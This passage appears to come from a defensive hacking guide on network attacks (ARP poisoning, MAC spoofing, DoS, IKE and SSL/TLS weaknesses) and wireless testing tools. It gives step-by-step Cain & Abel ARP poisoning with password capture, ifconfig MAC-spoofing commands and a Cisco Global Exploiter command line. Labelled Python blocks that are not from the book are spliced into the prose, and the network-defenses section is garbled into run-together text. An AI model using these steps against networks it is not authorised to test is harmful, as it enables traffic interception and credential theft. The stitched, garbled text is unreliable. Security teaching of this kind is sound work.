If your network analyzer permits it, configure it to use a first-in, first-out buffer.
This configuration overwrites the oldest data when the buffer fills up, but it might be your only option if memory and hard drive space are limited on your network analysis computer.
If your network analyzer permits it, record all the traffic into a capture file and save it to the hard drive. This is the ideal scenario — especially if you have a large hard drive, such as 500GB or more.
You can easily fill several hundred gigabytes' worth of hard drive space in a short period. I highly recommend running your network analyzer in what OmniPeek calls monitor mode. This allows the analyzer to keep track of what's happening, such as network usage and protocols, but not capture and store every single packet. Monitor mode — if supported by your analyzer — is very beneficial and is often all you need.
When network traffic doesn't look right in a network analyzer, it probably isn't. It's better to be safe than sorry.
Run a baseline when your network is working normally. When you have a baseline, you can see any obvious abnormalities when an attack occurs.
One thing I like to check for is the top talkers (network hosts sending/receiving the most traffic) on the network. If someone is doing something malicious on the network, such as hosting an FTP server or running Internet file-sharing software, using a network analyzer is often the only way you'll find out about it. A network analyzer is also a good tool for detecting systems infected with malware, such as a virus or Trojan horse. Figure 9-9 shows what it looks like to have a suspect protocol or application running on your network.
Figure 9-9: OmniPeek can help uncover someone running an illicit system, such as an FTP server.
Looking at your network statistics, such as bytes per second, network utilization, and inbound/outbound packet counts, is also a good way to determine whether something fishy is going on. Figure 9-10 contains network statistics as seen through the powerful CommView network analyzer.
Figure 9-10: CommView's interface for viewing network statistics.
TamoSoft — the maker of CommView — has another product called NetResident (www.tamos.com/products/netresident) that can track the usage of well-known protocols, such as HTTP, e-mail, FTP, and VoIP. As shown in Figure 9-11, you can use NetResident to monitor web sessions and play them back.
Figure 9-11: NetResident can track Internet usage and ensure security policies are enforced.
NetResident also has the capability to perform ARP poisoning via its PromiSwitch tool available under the Tools menu, which allows NetResident to see everything on the local network segment. I cover ARP poisoning in the section "The MAC-daddy attack," later in this chapter.
Countermeasures against network protocol vulnerabilities
A network analyzer can be used for good or evil. The good is to help ensure your security policies are being followed. The evil is when someone uses a network analyzer against you. A few countermeasures can help prevent someone from using an unauthorized network analyzer, although there's no way to prevent it completely.
If an external attacker or malicious user can connect to your network (physically or wirelessly), he can capture packets on the network, even if you're using an Ethernet switch.
Physical security
Ensure that adequate physical security is in place to prevent someone from plugging into your network:
Keep the bad guys out of your server room and wiring closet.
Ensure that the web, telnet, and SSH management interfaces on your Ethernet switches are especially secure to keep someone from changing the switch port configuration and seeing everything going across the wire.
Make sure that unsupervised areas, such as an unoccupied lobby or training room, don't have live network connections.
For details about physical security, see Chapter 7.
Network analyzer detection
You can use a network- or host-based utility to determine whether someone is running an unauthorized network analyzer on your network:
Sniffdet (http://sniffdet.sourceforge.net) for UNIX-based systems
PromiscDetect (http://ntsecurity.nu/toolbox/promiscdetect) for Windows
Certain IPSs can also detect whether a network analyzer is running on your network. These tools enable you to monitor the network for Ethernet cards that are running in promiscuous mode. You simply load the programs on your computer, and the programs alert you if they see promiscuous behaviors on the network (Sniffdet) or local system (PromiscDetect).
The MAC-daddy attack
Attackers can use ARP (Address Resolution Protocol) running on your network to make their systems appear as your system or another authorized host on your network.
ARP spoofing
An excessive number of ARP requests can be a sign of an ARP spoofing attack (also called ARP poisoning) on your network.
A client running a program, such as dsniff (www.monkey.org/~dugsong/dsniff) or Cain & Abel (www.oxid.it/cain.html), can change the ARP tables — the tables that store IP addresses to media access control (MAC) address mappings — on network hosts. This causes the victim computers to think they need to send traffic to the attacker's computer rather than to the true destination computer when communicating on the network. ARP spoofing is used during man-in-the-middle (MITM) attacks.
Spoofed ARP replies can be sent to a switch, which reverts the switch to broadcast mode and essentially turns it into a hub. When this occurs, an attacker can sniff every packet going through the switch and capture anything and everything from the network.
This security vulnerability is inherent in how TCP/IP communications are handled.
Here's a typical ARP spoofing attack with a hacker's computer (Hacky) and two legitimate network users' computers (Joe and Bob):
1. Hacky poisons the ARP caches of victims Joe and Bob by using dsniff, ettercap, or a utility he wrote.
2. Joe associates Hacky's MAC address with Bob's IP address.
3. Bob associates Hacky's MAC address with Joe's IP address.
4. Joe's traffic and Bob's traffic are sent to Hacky's IP address first.
5. Hacky's network analyzer captures Joe's and Bob's traffic.
If Hacky is configured to act like a router and forward packets, it forwards the traffic to its original destination. The original sender and receiver never know the difference!
Using Cain & Abel for ARP poisoning
You can perform ARP poisoning on your switched Ethernet network to test your IPS or to see how easy it is to turn a switch into a hub and capture anything and everything with a network analyzer.
ARP poisoning can be hazardous to your network's hardware and health, causing downtime and more. So be careful!
Perform the following steps to use Cain & Abel for ARP poisoning:
1. Load Cain & Abel and then click the Sniffer tab to enter the network analyzer mode.
The Hosts page opens by default.
2. Click the Start/Stop APR icon (the yellow and black circle).
The ARP poison routing (how Cain & Abel refers to ARP poisoning) process starts and enables the built-in sniffer.
3. If prompted, select the network adapter in the window that appears and then click OK.
4. Click the blue + icon to add hosts to perform ARP poisoning on.
5. In the MAC Address Scanner window that appears, ensure the All Hosts in My Subnet option is selected and then click OK.
6. Click the APR tab (the one with the yellow-and-black circle icon) to load the APR page.
7. Click the white space under the uppermost Status column heading (just under the Sniffer tab).
This re-enables the blue + icon.
8. Click the blue + icon and the New ARP Poison Routing window shows the hosts discovered in Step 3.
9. Select your default route (in my case, 10.11.12.1).
The right-hand column fills with all the remaining hosts, as shown in Figure 9-12.
10. Ctrl+click all the hosts in the right column that you want to poison.
11. Click OK and the ARP poisoning process starts.
This process can take anywhere from a few seconds to a few minutes depending on your network hardware and each host's local TCP/IP stack. The results of ARP poisoning on my test network are shown in Figure 9-13.
12. You can use Cain & Abel's built-in passwords feature to capture passwords traversing the network to and from various hosts simply by clicking the Passwords tab.
Figure 9-12: Selecting your victim hosts for ARP poisoning in Cain & Abel.
Figure 9-13: ARP poisoning results in Cain & Abel.
The preceding steps show how easy it is to exploit a vulnerability and prove that Ethernet switches aren't all they're cracked up to be from a security perspective.
MAC address spoofing
MAC address spoofing tricks the switch into thinking your computer is something else. You simply change your computer's MAC address and masquerade as another user.
You can use this trick to test access control systems, such as your IPS/firewall, and even your operating system login controls that check for specific MAC addresses.
UNIX-based systems
In UNIX and Linux, you can spoof MAC addresses with the ifconfig utility. Follow these steps:
1. While logged in as root, use ifconfig to enter a command that disables the network interface.
Insert the network interface number that you want to disable (usually, eth0) into the command, like this:
[root@localhost root]# ifconfig eth0 down
2. Enter a command for the MAC address you want to use.
Insert the fake MAC address and the network interface number (eth0) into the command again, like this:
[root@localhost root]# ifconfig eth0 hw ether new_mac_address
You can use a more feature-rich utility called GNU MAC Changer (https://github.com/alobbs/macchanger) for Linux systems.
Windows
You can use regedit to edit the Windows Registry, but I like using a neat Windows utility called SMAC (www.klcconsulting.net/smac), which makes MAC spoofing a simple process. Follow these steps to use SMAC:
1. Load the program.
2. Select the adapter for which you want to change the MAC address.
3. Enter the new MAC address in the New Spoofed MAC Address fields and click the Update MAC button.
4. Stop and restart the network card with these steps:
a. Right-click the network card in Network and Dialup Connections and then choose Disable.
b. Right-click again and then choose Enable for the change to take effect.
You might have to reboot for this to work properly.
5. Click the Refresh button in the SMAC interface.
To reverse Registry changes with SMAC, follow these steps:
1. Select the adapter for which you want to change the MAC address.
2. Click the Remove MAC button.
3. Stop and restart the network card with these steps:
a. Right-click the network card in Network and Dialup Connections and then choose Disable.
b. Right-click again and then choose Enable for the change to take effect.
You might have to reboot for this to work properly.
4. Click the Refresh button in the SMAC interface.
You should see your original MAC address again.
Countermeasures against ARP poisoning and MAC address spoofing attacks
A few countermeasures on your network can minimize the effects of an attack against ARP and MAC addresses:
Prevention: You can prevent MAC address spoofing if your switches can enable port security to prevent automatic changes to the MAC address tables.
No realistic countermeasures for ARP poisoning exist. The only way to prevent ARP poisoning is to create and maintain static ARP entries in your switches for every host on the network. This is something that hardly any network administrator has time to do in today's rat race.
Detection: You can detect these two types of hacks through an IPS or a standalone MAC address–monitoring utility.
Arpwatch (http://linux.maruhn.com/sec/arpwatch.html) is a Linux-based program that alerts you via e-mail when it detects changes in MAC addresses associated with specific IP addresses on the network.
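The detection side of the Joe/Bob/Hacky sequence described earlier and the Arp watch-style alerting just mentioned, as an added example that is not the book's code and not arpwatch itself: a watcher that records the IP-to-MAC mapping seen in ARP replies, alerts when a known IP changes MAC, and reports any MAC answering for several IPs. The hosts, MAC addresses, gateway and ARP stream are constructed.

```python
"""ARP poisoning detection in the spirit of arpwatch.

Added example, not from the book and not arpwatch's code: it keeps the
IP-to-MAC mappings seen in ARP replies, alerts when a known IP suddenly
answers from a different MAC (arpwatch's "changed ethernet address"), and
flags one MAC answering for several IPs, which is what the Joe/Bob/Hacky
sequence in the text looks like on the wire. Hosts, MACs, the gateway and
the ARP stream are constructed.
"""
from collections import defaultdict

ARP_REPLY = 2   # ARP opcode; requests (opcode 1) do not update the table here

GATEWAY_IP = "10.11.12.1"            # constructed default route (the Cain & Abel walkthrough's)
JOE, BOB, HACKY = "10.11.12.5", "10.11.12.6", "10.11.12.66"
JOE_MAC, BOB_MAC = "00:11:22:aa:00:05", "00:11:22:aa:00:06"
HACKY_MAC = "00:11:22:cc:00:66"


class ArpWatcher:
    def __init__(self, known=None):
        self.table = dict(known or {})   # ip -> mac, seeded from a trusted baseline
        self.alerts = []                 # (ts, severity, message)

    def observe(self, ts, opcode, sender_ip, sender_mac):
        """Feed one ARP packet; return the alert it produced, if any."""
        if opcode != ARP_REPLY:
            return None
        previous = self.table.get(sender_ip)
        self.table[sender_ip] = sender_mac
        if previous is None:
            alert = (ts, "info", f"new station {sender_ip} at {sender_mac}")
        elif previous != sender_mac:
            # A gateway that moves to a new MAC puts every host's traffic through that MAC.
            severity = "critical" if sender_ip == GATEWAY_IP else "warning"
            alert = (ts, severity,
                     f"changed ethernet address {sender_ip}: {previous} -> {sender_mac}")
        else:
            return None
        self.alerts.append(alert)
        return alert

    def macs_claiming_multiple_ips(self):
        """MAC -> set of IPs it currently answers for, for MACs with more than one IP."""
        by_mac = defaultdict(set)
        for ip, mac in self.table.items():
            by_mac[mac].add(ip)
        return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


# Constructed stream: normal replies, then Hacky answers for Joe and for the gateway.
SAMPLE_ARP = [
    (0.0, ARP_REPLY, JOE, JOE_MAC),
    (0.5, ARP_REPLY, BOB, BOB_MAC),
    (1.0, ARP_REPLY, HACKY, HACKY_MAC),
    (1.5, 1, JOE, JOE_MAC),                    # a request: ignored
    (2.0, ARP_REPLY, JOE, HACKY_MAC),          # poison: "Joe is at Hacky's MAC"
    (2.0, ARP_REPLY, GATEWAY_IP, HACKY_MAC),   # poison: "the gateway is at Hacky's MAC"
    (2.5, ARP_REPLY, BOB, BOB_MAC),            # unchanged: no alert
]


def run_sample():
    """Replay the constructed stream against a watcher that already knows the gateway."""
    watcher = ArpWatcher(known={GATEWAY_IP: "00:11:22:00:00:01"})
    for packet in SAMPLE_ARP:
        watcher.observe(*packet)
    return watcher


if __name__ == "__main__":
    watcher = run_sample()
    for ts, severity, message in watcher.alerts:
        print(f"{ts:5.1f} {severity:8} {message}")
    print("MACs answering for several IPs:", watcher.macs_claiming_multiple_ips())
```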
What you need to know about advanced malware
Advanced malware (also known as advanced persistent threat or APT) has been all the rage lately. Such targeted attacks are highly sophisticated and extremely difficult to detect — that is, unless you have the proper controls at the network and/or host layers. I once worked on a project where a large enterprise was targeted by a Nation State (presumably because of the line of work the enterprise was in) and ended up having over 10,000 Windows servers and workstations infected by malware. The enterprise's traditional, big box antivirus software was none the wiser. The project turned out to be an extensive exercise in incident response and forensics. The infection was traced back to a phishing attack that subsequently spread to all the systems while, at the same time, installing password-cracking tools to attempt to crack the local SAM file on each Windows machine.
This advanced malware infection is just one of countless examples of new advanced malware that most organizations are not prepared to prevent. The obvious solution to prevent such attacks is to keep users from clicking malicious links and preventing malware from being "dropped" onto the system. That's tough, if not impossible, to prevent. The next best thing is to use technology to your advantage. Advanced malware monitoring and threat protection tools such as Damballa Failsafe (www.damballa.com/solutions/damballa_failsafe.php), Next-Generation Firewalls such as what's offered by Palo Alto Networks (www.paloaltonetworks.com), and whitelisting, a.k.a. "positive security" technologies such as the Bit9 Security Platform (www.bit9.com/solutions/security-platform) that helps protect the host are a great way to fight this threat.
The bottom line: Don't underestimate the risk and power of targeted malware attacks.
Testing denial of service attacks
Denial of service (DoS) attacks are among the most common hacker attacks. A hacker initiates so many invalid requests to a network host that the host uses all its resources responding to the invalid requests and ignores the legitimate requests.
DoS attacks
DoS attacks against your network and hosts can cause systems to crash, data to be lost, and every user to jump on your case wondering when Internet access will be restored.
Here are some common DoS attacks that target an individual computer or network device:
SYN floods: The attacker floods a host with TCP SYN packets.
Ping of Death: The attacker sends IP packets that exceed the maximum length of 65,535 bytes, which can ultimately crash the TCP/IP stack on many operating systems.
WinNuke: This attack can disable networking on older Windows 95 and Windows NT computers.
Distributed DoS (DDoS) attacks have an exponentially greater impact on their victims. One of the most famous was the DDoS attack against eBay, Yahoo!, CNN, and dozens of other websites by a hacker known as MafiaBoy. While updating this book to the third edition, there was a highly publicized DDoS attack against Twitter, Facebook, and other social media sites. The attack was apparently aimed at one user from Georgia (the former Soviet country, not the state where I live), but it affected everyone using these sites. I couldn't tweet, and many of my friends and family members couldn't see what everyone was blabbing about on Facebook (oh, the humanity!). There have been numerous other highly publicized DDoS attacks since then. Think about this: When hundreds of millions of people can be taken offline by one targeted DDoS attack, you can see why understanding the dangers of denial of service against your business's systems and applications is important.
Testing
Denial of service testing is one of the most difficult security checks you can run. There just aren't enough of you and your computers to go around. Don't fret. You can run a few tests to see where you're weak. Your first test should be a search for DoS vulnerabilities from a vulnerability-scanning perspective. Using vulnerability scanners, such as Nexpose (www.rapid7.com/products/nexpose) and AppSpider (www.rapid7.com/products/appspider), you can find missing patches and configuration weaknesses that can lead to denial of service.
I once performed a security assessment where I used Qualys to find a vulnerability in an older version of OpenSSL running on a web server. As with most DoS findings, I didn't actually exploit the vulnerability because I didn't want to take down the production system. Instead, I listed it as a "medium priority" vulnerability — an issue that had the potential to be exploited. My client pushed back and said OpenSSL wasn't on the system. With permission, I downloaded the exploit code available on the Internet, compiled it, and ran it against my client's server. Sure enough, it took the server offline.
At first, my client thought it was a fluke, but after taking the server offline again, he bought into the vulnerability. It ended up that he was using an OpenSSL derivative, hence the vulnerability. Had my client not fixed the problem, there could have been any number of attackers around the world taking — and keeping — this production system offline, which could have been both tricky and time consuming to troubleshoot. Not good for business!
Don't test for DoS unless you have test systems or can perform controlled tests with the proper tools. Poorly planned DoS testing is a job search in the making. It's like trying to delete data from a network share and hoping that the access controls in place are going to prevent it.
Other DoS testing tools worth checking out are UDPFlood (www.mcafee.com/us/downloads/free-tools/udpflood.aspx), Blast (www.mcafee.com/us/downloads/free-tools/blast.aspx), NetScanTools Pro, and CommView.
Countermeasures against DoS attacks
Most DoS attacks are difficult to predict, but they can be easy to prevent:
Test and apply security patches (including service packs and firmware updates) as soon as possible for network hosts, such as routers and firewalls, as well as for server and workstation operating systems.
Use an IPS to monitor regularly for DoS attacks.
You can run a network analyzer in continuous capture mode if you can't justify the cost of an all-out IPS solution and use it to monitor for DoS attacks.
Configure firewalls and routers to block malformed traffic. You can do this only if your systems support it, so refer to your administrator's guide for details.
Minimize IP spoofing by filtering out external packets that appear to come from an internal address, the local host (127.0.0.1), or any other private and non-routable address, such as 10.x.x.x, 172.16.x.x–172.31.x.x, or 192.168.x.x. The following paper from Cisco Systems provides more information: www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_10-4/104_ip-spoofing.html.
Block all ICMP traffic inbound to your network unless you specifically need it. Even then, you should allow it to come in only to specific hosts.
Disable all unneeded TCP/UDP small services, such as echo and chargen.
Establish a baseline of your network protocols and traffic patterns before a DoS attack occurs. That way, you know what to look for. And periodically scan for such potential DoS vulnerabilities as rogue DoS software installed on network hosts.
If you get yourself in a real bind and end up under direct DoS assault, you can reach out to managed service vendors such as Imperva's Incapsula (www.incapsula.com), CloudFlare (www.cloudflare.com), and DOSarrest (www.dosarrest.com) who can help you out.
Work with a minimum necessary mentality (not to be confused with having too many craft beers) when configuring your network devices, such as firewalls and routers:
Identify traffic that is necessary for approved network usage.
Allow the traffic that's needed.
Deny all other traffic.
If worse comes to worst, you'll need to work with your ISP and see whether they can block DoS attacks on their end.
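The anti-spoofing, malformed-traffic, ICMP and small-services rules from the countermeasures list above, expressed as one ingress decision function and run over sample packets. This is an added example, not the book's code; the site's address ranges, the host allowed to receive ICMP and the packets are constructed.

```python
"""Ingress filter decisions from the DoS countermeasures list.

Added example, not from the book: one decision function that models the
anti-spoofing, malformed-packet, ICMP and small-services rules the text
lists for an Internet-facing interface, run over constructed packets.
The site's own prefixes, the ICMP whitelist and the packets are constructed.
"""
from collections import Counter
from ipaddress import ip_address, ip_network

# Addresses that must never arrive on the outside interface as a *source*:
# the site's own prefixes, loopback, and the private/non-routable ranges.
SITE_PREFIXES = [ip_network("203.0.113.0/24"), ip_network("10.11.12.0/24")]
NON_ROUTABLE = [ip_network(n) for n in
                ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ICMP_ALLOWED_TO = {"203.0.113.10"}            # only this host may receive inbound ICMP
SMALL_SERVICES = {7: "echo", 19: "chargen"}   # TCP/UDP small services to block
MAX_IP_LENGTH = 65535                         # anything longer is malformed (Ping of Death sized)


def ingress_decision(pkt):
    """Return 'accept' or 'drop: <reason>' for a packet arriving on the outside interface."""
    src = ip_address(pkt["src"])
    if any(src in net for net in SITE_PREFIXES + NON_ROUTABLE):
        return "drop: spoofed source"
    if pkt["len"] > MAX_IP_LENGTH:
        return "drop: malformed (oversized IP packet)"
    flags = set(pkt.get("flags", ()))
    if pkt["proto"] == "TCP" and {"SYN", "FIN"} <= flags:
        return "drop: malformed (SYN+FIN)"
    if pkt["proto"] == "ICMP":
        return "accept" if pkt["dst"] in ICMP_ALLOWED_TO else "drop: unsolicited ICMP"
    if pkt["proto"] in ("TCP", "UDP") and pkt.get("dport") in SMALL_SERVICES:
        return f"drop: small service {SMALL_SERVICES[pkt['dport']]}"
    return "accept"


def apply_policy(packets):
    """Return ([decision per packet], Counter of decisions)."""
    decisions = [ingress_decision(p) for p in packets]
    return decisions, Counter(decisions)


# Constructed packets as seen on the outside interface (lengths are IP total lengths).
SAMPLE_PACKETS = [
    {"src": "198.51.100.7", "dst": "203.0.113.10", "proto": "TCP", "dport": 80, "len": 60, "flags": ("SYN",)},
    {"src": "10.11.12.5", "dst": "203.0.113.10", "proto": "TCP", "dport": 80, "len": 60, "flags": ("SYN",)},   # our own internal address, from outside
    {"src": "127.0.0.1", "dst": "203.0.113.10", "proto": "UDP", "dport": 53, "len": 80},
    {"src": "192.168.1.50", "dst": "203.0.113.10", "proto": "ICMP", "len": 84},
    {"src": "198.51.100.7", "dst": "203.0.113.10", "proto": "ICMP", "len": 84},        # permitted ICMP target
    {"src": "198.51.100.7", "dst": "203.0.113.20", "proto": "ICMP", "len": 84},        # not a permitted target
    {"src": "198.51.100.8", "dst": "203.0.113.10", "proto": "ICMP", "len": 65600},     # Ping of Death sized
    {"src": "198.51.100.8", "dst": "203.0.113.10", "proto": "TCP", "dport": 22, "len": 60, "flags": ("SYN", "FIN")},
    {"src": "198.51.100.9", "dst": "203.0.113.10", "proto": "UDP", "dport": 19, "len": 40},
]


if __name__ == "__main__":
    decisions, summary = apply_policy(SAMPLE_PACKETS)
    for pkt, decision in zip(SAMPLE_PACKETS, decisions):
        print(f"{pkt['src']:>14} -> {pkt['dst']:<14} {pkt['proto']:4} {decision}")
    print(dict(summary))
```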
Detecting Common Router, Switch, and Firewall Weaknesses
In addition to the more technical exploits that I cover in this chapter, some high-level security vulnerabilities commonly found on network devices can create many problems.
Finding unsecured interfaces
You want to ensure that HTTP and telnet interfaces to your routers, switches, and firewall aren't configured with a blank, default, or otherwise easy-to-guess password. This advice sounds like a no-brainer, but it's by far one of the most common weaknesses. When a malicious insider or other attacker gains access to your network devices, he owns the network. He can then lock out administrative access, set up back-door user accounts, reconfigure ports, and even bring down the entire network without you ever knowing.
I once found a simple password that a systems integrator had configured on a Cisco ASA firewall and was able to log in to the firewall with full administrative rights. Just imagine what could happen in this situation if someone with malicious intent came across this password. Lesson learned: It's the little things that can get you. Know what your vendors are doing and keep an eye on them!
Another weakness is related to HTTP and telnet being enabled and used on many network devices. Care to guess why this is a problem? Well, anyone with some free tools and a few minutes of time can sniff the network and capture login credentials for these systems when they're being sent in cleartext. When that happens, anything goes.
Exploiting IKE weaknesses
Businesses running a VPN on a router or firewall are common. If you fall into this category, chances are good that your VPN is running the Internet Key Exchange (IKE) protocol, which has a couple of well-known exploitable weaknesses:
It's possible to crack IKE "aggressive mode" pre-shared keys using Cain & Abel and the IKECrack tool (http://ikecrack.sourceforge.net).
Some IKE configurations, such as those in certain Cisco PIX firewalls, can be taken offline. All the attacker has to do is send 10 packets per second at 122 bytes each and you have a DoS attack on your hands.
You can manually poke around to see whether your router, switches, and firewalls are vulnerable to these issues, but the best way to find this information is to use a well-known vulnerability scanner, such as Nexpose. After you find which vulnerabilities exist, you can take things a step further by using the Cisco Global Exploiter tool (available via the Kali Linux toolset). To run Cisco Global Exploiter, follow these steps:
1. Download and burn the BackTrack Linux ISO image to DVD or boot the image directly through VMware or VirtualBox.
2. After you enter the Kali Linux GUI, click Applications, Vulnerability Analysis, Cisco Tool, and then cisco-global-exploiter.
3. Enter the command perl cge.pl ip_address exploit_number, as shown in Figure 9-14.
Figure 9-14: Cisco Global Exploiter tool for exploiting well-known Cisco weaknesses.
Another Cisco router-related tool is called SYNful Knock Scanner (http://talosintel.com/scanner) that tests systems for the nasty SYNful Knock malware that was discovered in 2015.
Good scanners and exploitation tools will save you a ton of time and effort that you can spend on other, more important things, such as Facebook and Twitter.
Uncovering issues with SSL and TLS
SSL and Transport Layer Security (TLS) were long touted as the solution for securing network communications. However, recently, SSL and TLS have come under fire with demonstrable exploits such as Heartbleed, Padding Oracle On Downgraded Legacy Encryption (POODLE), and Factoring Attack on RSA-EXPORT Keys (FREAK).
General security vulnerabilities related to SSL and TLS are often uncovered by vulnerability scanners such as Nexpose and Netsparker. In addition to the three SSL/TLS vulnerabilities above, be on the lookout for the following flaws as well:
SSL versions 2 or 3 as well as TLS versions 1.0 or 1.1 in use.
Weak encryption ciphers such as RC4 and SHA-1.
If you are unsure about existing SSL and TLS vulnerabilities on your systems, you don't have to use a vulnerability scanner at all. Qualys has a nice website called SSL Labs (www.ssllabs.com) that will scan for these vulnerabilities for you.
I didn't used to be too concerned with SSL and TLS-related vulnerabilities, but as security researchers and criminal hackers have been demonstrating, the threat is real and needs to be addressed.
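The two flaws listed above (old protocol versions, RC4 and SHA-1 suites) checked from the configuration side rather than by scanning: a weak TLS context beside a hardened one, plus an audit routine for any context. This is an added example, not the book's code and not what SSL Labs or Nexpose run; it uses only Python's standard ssl module, and the exact suites the weak context ends up with depend on the local OpenSSL build.

```python
"""Checking a TLS configuration against the page's SSL/TLS checklist.

Added example, not from the book: a context with the weak settings the
text warns about (old protocol versions and RC4/SHA-1 suites) beside a
hardened one, plus an audit function for any ssl.SSLContext. Uses only the
standard library; the cipher names come from the local OpenSSL build, so
exactly which weak suites the weak context ends up with varies by system.
"""
import ssl

# Substrings that mark a cipher suite as weak; a trailing "-SHA" means HMAC-SHA-1.
WEAK_CIPHER_MARKERS = ("RC4", "MD5", "DES", "NULL", "EXP")


def weak_context():
    """The kind of configuration a scanner flags: TLS 1.0 still allowed, 'ALL' ciphers."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    ctx.set_ciphers("ALL:!aNULL")
    return ctx


def hardened_context():
    """TLS 1.2 and later only, forward-secret AEAD suites only (no RC4, no CBC/SHA-1 suites)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!MD5")
    return ctx


def audit_context(ctx):
    """Return a list of findings; an empty list means the context meets the checklist."""
    findings = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append(f"minimum protocol is {ctx.minimum_version.name}; require TLS 1.2 or later")
    for suite in ctx.get_ciphers():
        name = suite["name"]
        if name.endswith("-SHA") or any(marker in name for marker in WEAK_CIPHER_MARKERS):
            findings.append(f"weak cipher suite enabled: {name}")
    return findings


if __name__ == "__main__":
    for label, ctx in (("weak", weak_context()), ("hardened", hardened_context())):
        print(f"{label}: {audit_context(ctx) or ['no findings']}")
```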
PuttingUpGeneralNetworkDefensesRegardlessofthespecificattacksagainstyoursystem,afewgoodpracticescanhelppreventmanynetworkproblems:
Usestatefulinspectionrulesthatmonitortrafficsessionsforfirewalls.ThiscanhelpensurethatalltraffictraversingthefirewallislegitimateandcanpreventDoSattacksandotherspoofingattacks.Implementrulestoperformpacketfilteringbasedontraffictype,TCP/UDPports,IPaddresses,andevenspecificinterfacesonyourroutersbeforethetrafficisallowedtoenteryournetwork.UseproxyfilteringandNetworkAddressTranslation(NAT)orPortAddressTranslation(PAT).Findandeliminatefragmentedpacketsenteringyournetwork(fromFraggleoranothertypeofattack)viaanIPS.Includeyournetworkdevicesinyourvulnerabilityscans.Ensureyournetworkdeviceshavethelatestvendorfirmwareandpatchesapplied.Setstrongpasswords—betteryet,passphrases—onallnetworksystems.IcoverpasswordsinmoredetailinChapter8.Don’tuseIKEaggressivemodepre-sharedkeysforyourVPN.Ifyoumust,ensurethepassphraseisstrongandchangedperiodically(suchasevery6–12months).AlwaysuseTLS(viaHTTPS,etc.)orSSHwhenconnectingtonetworkdevices.DisableSSLandweakciphersandonlyuseTLSversion1.2andstrongcipherssuchasSHA-2wherepossible.Segmentthenetworkanduseafirewallonthefollowing:
TheDMZTheinternalnetworkCriticalsubnetworksbrokendownbybusinessfunctionordepartment,suchasaccounting,finance,HR,andresearch
Chapter 10: Wireless Networks

In This Chapter
- Understanding risks of wireless networks
- Selecting wireless network hacking tools
- Cracking wireless encryption
- Minimizing wireless network risks
Wireless local area networks (or Wi-Fi), specifically the ones based on the IEEE 802.11 standard, are increasingly being deployed into both business and home networks. Wi-Fi has been the poster child for weak security and network hack attacks since the inception of 802.11 a decade and a half ago. The stigma of unsecure Wi-Fi is starting to wane, but this isn't the time to lower your defenses.

Wi-Fi offers a ton of business value, from convenience to reduced network deployment time. Whether or not your organization allows wireless network access, you probably have it, so testing for Wi-Fi security vulnerabilities is critical. In this chapter, I cover some common wireless network security vulnerabilities that you should test for, and I discuss some cheap and easy countermeasures that you can implement to help ensure that Wi-Fi isn't more of a risk to your organization than it's worth.

Understanding the Implications of Wireless Network Vulnerabilities

Wi-Fi is very susceptible to attack, even more so than wired networks (discussed in Chapter 9), if it's not configured or deployed properly. Wireless networks have long-standing vulnerabilities that can enable an attacker to bring your network to its knees or allow your sensitive information to be extracted right out of thin air. If your wireless network is compromised, you can experience the following problems:

- Loss of network access, including e-mail, web, and other services, which can cause business downtime
- Loss of sensitive information, including passwords, customer data, intellectual property, and more
- Regulatory consequences and legal liabilities associated with unauthorized users gaining access to your business systems

Most of the wireless vulnerabilities are in the implementation of the 802.11 standard. Wireless access points (APs) and client systems have some vulnerabilities as well.

Various fixes have come along in recent years to address these vulnerabilities, yet many of these fixes still haven't been properly applied or aren't enabled by default. Your employees might also install rogue wireless equipment on your network without your knowledge. Then there's "free" Wi-Fi practically everywhere your mobile workforce goes. From coffee shops to hotels to conference centers, these Internet connections are one of the most serious threats to your overall information security and a pretty difficult one to fight. Even when Wi-Fi is hardened and all the latest patches have been applied, you still might have security problems, such as denial of service (DoS), man-in-the-middle attacks, and encryption key weaknesses (like you have on wired networks; see Chapter 9), that will likely be around for a while.
Choosing Your Tools

Several great wireless security tools are available for both the Windows and Linux platforms. Early on, Linux wireless tools were a bear to configure and run properly, probably because I'm not that smart. However, that problem has changed in recent years with programs such as Kismet (www.kismetwireless.net), Wellenreiter (http://sourceforge.net/projects/wellenreiter), and Kali Linux (www.kali.org).

If you want the power of the security tools that run on Linux, but you're not interested in installing and learning much about Linux or don't have the time to download and set up many of its popular security tools, I highly recommend you check out Kali Linux. The bootable Debian-based security testing suite comes with a slew of tools that are relatively easy to use. Alternative bootable (or live) testing suites include the Fedora Linux-based Network Security Toolkit (www.networksecuritytoolkit.org). A complete listing of live bootable Linux toolkits is available at www.livecdlist.com.

Most of the tests I outline in this chapter require only Windows-based utilities, but use the platform you're most familiar with. You'll get better results that way. My favorite tools for assessing wireless networks in Windows are as follows:

- Aircrack-ng (http://aircrack-ng.org)
- CommView for WiFi (www.tamos.com/products/commwifi)
- ElcomSoft Wireless Security Auditor (www.elcomsoft.com/ewsa.html)
- OmniPeek (www.savvius.com)

You can also use a handheld wireless security testing device, such as the handy Digital Hotspotter by Canary Wireless (www.canarywireless.com), and even your Android-based phone or tablet with apps such as WiEye or Wifi Analyzer, or an iOS device with apps such as Network Analyzer and Network Multimeter. An external antenna is also something to consider as part of your arsenal. I have had good luck running tests without an antenna, but your mileage may vary. If you're performing a walkthrough of your facilities to test for wireless signals, for example, using an additional antenna increases your odds of finding both legitimate and (more important) unauthorized wireless systems. You can choose among three types of wireless antennas:

- Omnidirectional: Transmits and receives wireless signals in 360 degrees over shorter distances, such as in boardrooms or reception areas. These antennas, also known as dipoles, typically come installed on APs from the factory.
- Semidirectional: Transmits and receives directionally focused wireless signals over medium distances, such as down corridors and across one side of an office or building.
- Directional: Transmits and receives highly focused wireless signals over long distances, such as between buildings. This antenna, also known as a high-gain antenna, is the antenna of choice for wireless hackers driving around cities looking for vulnerable APs, an act known as wardriving.

